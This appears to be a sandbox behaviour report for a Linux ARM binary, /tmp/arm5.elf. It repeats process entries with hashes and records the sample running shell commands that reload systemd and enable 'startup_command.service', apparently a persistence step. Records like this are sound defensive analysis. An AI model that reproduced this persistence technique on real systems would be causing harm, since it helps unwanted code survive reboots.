                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:07
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:12
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:12
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:15
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:17
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:17
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:22
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:22
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:29
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:29
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:37
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:37
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:45
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:45
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:45
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:52
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:52
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:52
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:00
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:00
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:00
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:07
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:07
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:12
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:15
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:22
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:22
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:30
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:30
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:37
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:37
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:45
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:45
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:45
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:52
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:43:52
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:48
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:49
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:48
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:48
                                                                Start date (UTC):01/01/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "systemctl daemon-reload"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:49
                                                                Start date (UTC):01/01/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:49
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl daemon-reload
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:49
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:49
                                                                Start date (UTC):01/01/2025
                                                                Path:/bin/sh
                                                                Arguments:sh -c "systemctl enable startup_command.service"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:49
                                                                Start date (UTC):01/01/2025
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:49
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/bin/systemctl
                                                                Arguments:systemctl enable startup_command.service
                                                                File size:996584 bytes
                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:49
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:49
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                File size:22760 bytes
                                                                MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:50
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:50
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                File size:22760 bytes
                                                                MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:51
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/libexec/gnome-session-binary
                                                                Arguments:-
                                                                File size:334664 bytes
                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:51
                                                                Start date (UTC):01/01/2025
                                                                Path:/bin/sh
                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:51
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/libexec/gsd-rfkill
                                                                Arguments:/usr/libexec/gsd-rfkill
                                                                File size:51808 bytes
                                                                MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:52
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/lib/systemd/systemd
                                                                Arguments:-
                                                                File size:1620224 bytes
                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:52
                                                                Start date (UTC):01/01/2025
                                                                Path:/lib/systemd/systemd-hostnamed
                                                                Arguments:/lib/systemd/systemd-hostnamed
                                                                File size:35040 bytes
                                                                MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:53
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/sbin/gdm3
                                                                Arguments:-
                                                                File size:453296 bytes
                                                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:53
                                                                Start date (UTC):01/01/2025
                                                                Path:/etc/gdm3/PrimeOff/Default
                                                                Arguments:/etc/gdm3/PrimeOff/Default
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:53
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/sbin/gdm3
                                                                Arguments:-
                                                                File size:453296 bytes
                                                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:53
                                                                Start date (UTC):01/01/2025
                                                                Path:/etc/gdm3/PrimeOff/Default
                                                                Arguments:/etc/gdm3/PrimeOff/Default
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Chronological Activities